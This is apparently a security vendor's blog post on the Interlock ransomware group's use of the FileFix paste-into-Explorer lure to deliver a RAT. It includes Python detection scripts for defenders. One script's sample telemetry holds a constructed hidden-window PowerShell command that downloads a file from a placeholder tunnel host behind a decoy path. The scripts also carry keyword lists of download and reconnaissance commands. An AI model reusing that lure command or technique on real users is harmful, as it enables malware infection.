The Interlock ransomware group is stepping up its game. They are now using a new tactic called FileFix in their attacks, and it's not exactly for fixing files. This technique allows them to sneak a remote access Trojan (RAT) into infected systems, giving them full control over the victim machines.
In recent months there has been a sharp increase in Interlock's activity. The reason is distribution: the group behind the ransomware has started using a web injector called KongTuke (also known as LandUpdate808), which plants malicious JavaScript on previously compromised, otherwise legitimate websites and uses them to push malware to visitors.
This new approach has not gone unnoticed. In May, researchers at The DFIR Report and Proofpoint observed compromised sites presenting visitors with a fake CAPTCHA verification.
While the page displayed its instructions, its script silently copied a command to the clipboard; the visitor was then told to open the Windows Run dialog (Win+R), paste (Ctrl+V) and press Enter. This is the ClickFix technique: the user is tricked into running malicious code with their own hands, without realizing what the pasted text actually does.
The evolution of Interlock: From PowerShell to FileFix as an attack method
The deception is no small matter: the pasted text is a PowerShell one-liner that downloads and launches a Node.js-based version of the Interlock RAT. In other words, the attacker gets a remote access channel the moment the victim presses Enter.
But the story doesn't end there. In June, researchers discovered another variant, this time written in PHP, which was also being actively used. How was it distributed? Through the same malicious web injector, KongTuke.
Most interesting (and worrying) is that, earlier this month, a significant change was detected in how Interlock delivers its malware. The group has adopted a variation of ClickFix known as FileFix, which has become its new preferred method for infecting victims.
FileFix: The new social engineering tactic used by cyberattackers
FileFix is a relatively new technique in the social engineering arsenal. Derived from ClickFix, it was published as a proof of concept by the researcher mr.d0x in June 2025, and Interlock's campaign is the first confirmed use of it in real attacks. It distributes malware silently, deceptively and surprisingly effectively, and it is likely to gain ground fast.
How does FileFix work?
The key to FileFix lies in leveraging the Windows interface itself, through familiar elements such as File Explorer (the original variant) or, in a later variant, an .HTA (HTML application) file that the victim is tricked into saving from the browser. Instead of relying on a suspicious attachment or link, the attacker asks the user to perform what looks like an ordinary, legitimate action.
The trick is simple but ingenious: the user is asked to "open a file" by pasting what appears to be a path into the File Explorer address bar. In reality the clipboard holds a PowerShell command followed by a '#' and the fake path. PowerShell treats everything after '#' as a comment, and the string is typically padded with spaces so that only the path is visible in the address bar. File Explorer treats the pasted text as a command to run, so explorer.exe launches PowerShell, which downloads the malware. No file passes through the browser, so there is no Mark of the Web and no SmartScreen prompt: Windows is simply doing what the address bar is designed to do.
Interlock and FileFix: A dangerous combination
In recent attacks linked to Interlock ransomware, the operators have adopted this technique to infect devices without raising suspicion. The process is as follows:
- The victim is shown a message saying they need to "repair" or "access" a file.
- They are asked to paste a supposed file path into the File Explorer address bar.
- That path is really a hidden command that downloads a remote access tool (RAT) from a trycloudflare.com hostname (a Cloudflare quick tunnel), so the download blends in with legitimate Cloudflare traffic.
- The system is compromised and the collection of sensitive data begins.
Interlock FileFix Attack (Source: DFIR Report)
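To make the mechanism and the infection steps above concrete, here is an added example in Python. It is not code from this article, from The DFIR Report, or from the Interlock operators: it splits a FileFix-style string into the hidden command and the decoy path, and scores a process-creation event (Sysmon Event ID 1 or Windows 4688 style fields) the way a detection rule would. The telemetry, the trycloudflare hostname and the decoy path are constructed, and the cue list is an assumption to tune against your own data.

```python
"""Added example, not code from the article or from the Interlock operators.
Pulls apart a FileFix-style clipboard string and scores a process-creation
event with Sysmon EID 1 / Windows 4688 style fields. All samples are constructed."""
import re

# FileFix shape: a real command, then a PowerShell comment carrying a fake path.
# PowerShell ignores everything after '#'; the victim sees only the path.
_DECOY = re.compile(r"^(?P<command>.*?\S)\s+#\s*(?P<decoy>[A-Za-z]:\\\S.*)$", re.S)

# Heuristic download/execute cues seen in paste-and-run lures (assumed list).
_DOWNLOAD_CUES = ("iwr ", "invoke-webrequest", "downloadstring", "downloadfile",
                  "curl ", "bitsadmin", "start-bitstransfer", "invoke-expression", "iex ")

_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def split_filefix_string(text):
    """Return (hidden_command, decoy_path) when text has the FileFix shape,
    else None. A plain path or a plain command does not match."""
    m = _DECOY.match(text.strip())
    return (m.group("command"), m.group("decoy")) if m else None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def filefix_indicators(event):
    """List the reasons one process-creation event looks like FileFix."""
    reasons = []
    parent, image = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    # Address-bar execution: explorer.exe, not a browser, is the parent.
    if parent == "explorer.exe" and image in _INTERPRETERS:
        reasons.append("interpreter spawned by explorer.exe")
    if split_filefix_string(cmd):
        reasons.append("trailing '# <path>' decoy comment")
    if any(cue in low for cue in _DOWNLOAD_CUES):
        reasons.append("download/execute cue")
    if "trycloudflare.com" in low:
        reasons.append("trycloudflare.com tunnel URL")
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        reasons.append("hidden window flag")
    return reasons


def is_filefix(event):
    """The decoy comment is decisive on its own; otherwise require three cues so
    that an admin opening PowerShell from the address bar does not fire the rule."""
    reasons = filefix_indicators(event)
    return any("decoy" in r for r in reasons) or len(reasons) >= 3


# Constructed telemetry: one lure, one admin one-liner, one unrelated process.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr https://example-words.trycloudflare.com/cfg.php -OutFile $env:TEMP\cfg.php" # C:\company\Internal-Secure\Report.pdf'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoExit -Command Get-ChildItem C:\Logs"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --type=renderer"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_filefix(ev), filefix_indicators(ev))
    print(split_filefix_string(SAMPLE_EVENTS[0]["CommandLine"]))
```

The useful point for defenders is the parent process: a command typed into the File Explorer address bar is spawned by explorer.exe, not by the browser that served the lure, so detections keyed on "browser spawns PowerShell" miss it. The decoy comment, a download cmdlet and a hidden-window flag in the same command line are what separate the lure from an administrator's one-liner.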
Read more: Hackers Test ClickFix Attacks against Targets on Linux and macOS
What does the malware do once it's inside?
Once the PHP-based RAT is running, it starts collecting information about the system and the network. It runs PowerShell commands for internal reconnaissance (network configuration, hardware details, active services, and more), packages the results as structured JSON, and quietly sends them to the attacker-controlled server.
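That reconnaissance burst can be caught without knowing the RAT's exact commands. Below is an added example in Python (not the RAT's code and not a rule from The DFIR Report) that groups process-creation events by parent PID and alerts when one parent runs three or more distinct classes of discovery commands inside a five-minute window. The log lines, the keyword table and the thresholds are constructed assumptions.

```python
"""Added example, not the RAT's code or The DFIR Report's detection content.
Flags a parent process that runs several distinct classes of discovery commands
inside a short window. The log lines below are constructed."""
from collections import defaultdict
from datetime import datetime

# Keyword -> discovery class map (assumed; extend from your own telemetry).
RECON_CATEGORIES = {
    "host":     ("systeminfo", "get-computerinfo", "win32_computersystem", "win32_bios"),
    "network":  ("ipconfig", "get-netipconfiguration", "get-netneighbor", "arp -a", "route print"),
    "services": ("get-service", "sc query", "tasklist", "get-process"),
    "domain":   ("nltest", "get-addomaincontroller", "net group", "get-adcomputer", "dsquery"),
    "backups":  ("vssadmin", "wbadmin", "backup"),
}

# Constructed process-creation log: timestamp|parent_pid|image|command_line
SAMPLE_LOG = """\
2025-07-10T12:00:01Z|4120|powershell.exe|systeminfo
2025-07-10T12:00:03Z|4120|powershell.exe|Get-NetIPConfiguration
2025-07-10T12:00:04Z|4120|powershell.exe|Get-Service
2025-07-10T12:00:09Z|4120|powershell.exe|nltest /dclist:corp.local
2025-07-10T12:00:12Z|4120|cmd.exe|dir C:\\Backups /s
2025-07-10T12:05:00Z|5230|powershell.exe|Get-ChildItem C:\\Logs
2025-07-10T12:06:00Z|5230|powershell.exe|Get-Service
2025-07-10T12:45:00Z|5230|cmd.exe|ipconfig /all
"""


def parse_line(line):
    """Split one pipe-delimited log line into a dict with a parsed timestamp."""
    ts, pid, image, cmd = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "pid": pid, "image": image, "cmd": cmd}


def classify(cmd):
    """Return the discovery class of a command line, or None if it is not one."""
    low = cmd.lower()
    for cat, keys in RECON_CATEGORIES.items():
        if any(k in low for k in keys):
            return cat
    return None


def detect_recon_bursts(log_text, window_seconds=300, min_categories=3):
    """One alert per parent PID whose children cover at least min_categories
    distinct discovery classes within window_seconds of each other."""
    by_pid = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        cat = classify(ev["cmd"])
        if cat:
            by_pid[ev["pid"]].append((ev["ts"], cat, ev["cmd"]))
    alerts = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e[0])
        for i, (t0, _, _) in enumerate(evs):
            window = [e for e in evs[i:] if (e[0] - t0).total_seconds() <= window_seconds]
            cats = {c for _, c, _ in window}
            if len(cats) >= min_categories:
                alerts.append({"pid": pid, "start": t0.isoformat(),
                               "categories": sorted(cats),
                               "commands": [c for _, _, c in window]})
                break  # one alert per parent is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_recon_bursts(SAMPLE_LOG):
        print(alert)
```

In the constructed log, parent 4120 runs host, network, service, domain and backup discovery inside eleven seconds and is flagged, while parent 5230, which runs a directory listing and two admin commands forty minutes apart, is not. The sliding window is what keeps an administrator's routine checks from lighting up the rule; tighten or loosen it to match how your own operators work.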
Signs of hands-on-keyboard activity by the attackers have also been observed, including:
- Exploring local directories.
- Searching for backups.
- Identifying domain controllers.
- Enumerating Active Directory.
- Lateral movement over RDP (Remote Desktop).
All of this allows them to expand their control and plan the next stage of the attack.
Full control from the C2 server
Once the connection to the command and control (C2) server is established, the attacker can:
- Execute commands on the infected machine as if sitting in front of it.
- Install new malicious payloads.
- Establish persistence through registry keys, so access survives a reboot.
- Expand to other computers on the internal network.
Interlock: Evolving ransomware
Interlock was first detected in September 2024, and since then it has been gaining notoriety. Its victims include high-profile organizations such as Texas Tech University, DaVita, and Kettering Health.
In its early stages, Interlock used techniques such as ClickFix to enter systems. However, the move to FileFix demonstrates a clear evolution: the attacker is seeking increasingly stealthy, deceptive, and effective methods.
This change in tactics also marks an important point in the evolution of social engineering applied to malware: it is no longer just a matter of deceiving users with fake emails, but of getting the user to run the attacker's command with their own hands, through a legitimate Windows feature that security tooling does not question.
Why should you care about FileFix?
This is the first time that the use of FileFix in real attacks has been publicly confirmed. It is a clear sign that threat groups are testing and adopting this tactic, and it won't be long before others start imitating it.
As more malicious actors discover its effectiveness, FileFix is likely to become a common technique in many attack chains, especially in campaigns targeting less technical users or teams with lax security measures.
How to protect yourself from FileFix attacks and other similar threats
- Be wary of unusual instructions, especially any that involve copying and pasting text into the Run dialog, a terminal, or the File Explorer address bar.
- Do not execute paths or code that you do not understand, even if they come from supposedly trusted sources.
- Keep systems updated and use security tooling that detects suspicious behaviour rather than relying on signatures alone; a command run from the address bar appears in telemetry as powershell.exe or cmd.exe with explorer.exe as its parent, which is worth alerting on.
- Educate your teams, because social engineering does not attack systems, it attacks people.
Read more: How to detect and respond to a ransomware attack with TecnetProtect
Conclusion
Interlock ransomware and its new FileFix tactic demonstrate how cyberattacks continue to evolve, becoming increasingly difficult to detect. These types of threats no longer rely solely on technical vulnerabilities, but also leverage social engineering to manipulate users and execute malicious code without raising suspicion.
Given this scenario, traditional solutions are no longer sufficient. Companies need a solid defense strategy that combines advanced technology, real-time monitoring, and ongoing training for their teams. This is where tools such as the following come into play:
- A Security Operations Center (SOC) for 24/7 active surveillance.
- XDR solutions that integrate visibility and detection across multiple layers.
- EDR technology, which allows you to act quickly in response to anomalous behavior on endpoints.
- And cybersecurity awareness programs, which prepare staff to identify and avoid deception-based threats.
At TecnetOne, we offer each of these solutions and more. We help companies of all sizes protect their digital assets, minimize risks, and respond effectively to incidents. Our approach combines cutting-edge technology with a team of cybersecurity specialists, ready to help you prevent attacks like Interlock's before they can affect your operations.
Security is not optional. If you want to stay ahead of attackers, contact us. At TecnetOne, we are ready to be your strategic ally in cybersecurity.